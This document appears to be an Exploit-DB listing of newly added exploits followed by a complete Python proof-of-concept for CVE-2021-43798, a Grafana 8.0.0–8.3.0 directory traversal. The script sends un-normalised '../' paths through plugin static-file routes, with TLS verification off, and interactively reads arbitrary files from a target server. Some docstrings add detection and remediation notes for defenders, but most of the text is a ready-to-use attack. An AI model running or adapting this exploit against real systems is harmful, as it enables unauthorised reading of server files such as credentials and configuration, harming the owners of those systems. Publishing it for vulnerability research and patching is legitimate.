
11 changes to exploits/shellcodes MTPutty 1.0.1.21 - SSH Password Disclosure Raspberry Pi 5.10 - Default Credentials Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated) LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) TestLink 1.19 - Arbitrary File Download (Unauthenticated) Student Management System 1.0 - SQLi Authentication Bypass Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated) Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
# Date: 08/12/2021
# Exploit Author: s1gh
# Vendor Homepage: https://grafana.com/
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
# Version: V8.0.0-beta1 through V8.3.0
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to directory traversal, allowing access to local files.
# CVE: CVE-2021-43798
# Tested on: Debian 10
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import argparse
import sys
from random import choice
# Plugin ids, spelled exactly as in the source listing. exploit() picks one at
# random per request and places it in the /public/plugins/<id>/ path prefix.
# Because the id varies from request to request, log-based detection should
# key on the traversal segments that follow the prefix, not on a specific id.
plugin_list = [
    "alertlist", "annolist", "barchart", "bargauge", "candlestick",
    "cloudwatch", "dashlist", "elasticsearch", "gauge", "geomap",
    "gettingstarted", "grafana-azure-monitor-datasource", "graph", "heatmap",
    "histogram", "influxdb", "jaeger", "logs", "loki", "mssql",
    "mysql", "news", "nodeGraph", "opentsdb", "piechart",
    "pluginlist", "postgres", "prometheus", "stackdriver", "stat",
    "state-timeline", "status-histor", "table", "table-old", "tempo",
    "testdata", "text", "timeseries", "welcome", "zipkin",
]
def exploit(args):
    """Interactively request caller-supplied paths through the plugin static-file route.

    Proof of concept for CVE-2021-43798 (Grafana 8.0.0-beta1 through 8.3.0,
    per the file header). Each loop iteration reads a path from stdin, appends
    it to ``<host>/public/plugins/<plugin id>/`` plus a fixed run of ``..``
    segments, sends a single GET, and prints the response body on HTTP 200.

    Args:
        args: Parsed CLI namespace. Only ``args.host`` is read; it is
            concatenated into the URL without validation.

    Returns:
        None. The loop ends on a connect timeout or on a response that is
        neither the "Plugin file not found" message nor HTTP 200; otherwise
        it keeps prompting until interrupted.

    Defender notes:
        * On the wire the request path is ``/public/plugins/<id>/`` followed
          by literal, un-collapsed ``../`` segments, which is what access-log
          or WAF rules should match on.
        * The User-Agent below is a fixed string but trivially changed, so it
          is a weak indicator on its own.
        * Remediation is to upgrade past the affected range listed in the
          file header, following the vendor advisory linked there.

    NOTE(review): indentation was lost in this listing; the nesting here
    (in particular the ``return`` sitting inside the non-200 branch) is
    reconstructed and should be confirmed against the upstream file.
    """
    s = requests.Session()
    headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }

    while True:
        file_to_read = input('Read file > ')

        try:
            # A random plugin id is chosen for every request (see plugin_list).
            url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
            req = requests.Request(method='GET', url=url, headers=headers)
            prep = req.prepare()
            # The prepared URL is overwritten with the raw string, presumably
            # because prepare() would otherwise normalise the '..' segments
            # before sending -- confirm against the requests version in use.
            prep.url = url
            # verify=False disables TLS certificate validation for this request.
            r = s.send(prep, verify=False, timeout=3)

            # The server's own error text is used to tell "no such file" apart
            # from other failures.
            if 'Plugin file not found' in r.text:
                print('[-] File not found\n')
            else:
                if r.status_code == 200:
                    print(r.text)
                else:
                    print('[-] Something went wrong.')
                    return
        except requests.exceptions.ConnectTimeout:
            print('[-] Request timed out. Please check your host settings.\n')
            return
        except Exception:
            # Every other error is swallowed silently and the prompt repeats.
            pass
def main():
    """Parse the command line and run the interactive loop.

    The only option is ``-H`` (required), stored as ``host`` and handed to
    exploit() unvalidated. A Ctrl-C during the loop ends the function quietly.
    """
    cli = argparse.ArgumentParser(
        description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read",
    )
    cli.add_argument('-H', dest='host', required=True, help="Target host")
    options = cli.parse_args()

    try:
        exploit(options)
    except KeyboardInterrupt:
        # Treat an interrupt as a normal way to leave the prompt.
        pass
if __name__ == '__main__':
    # Run the CLI only when executed as a script, then exit with status 0.
    main()
    raise SystemExit(0)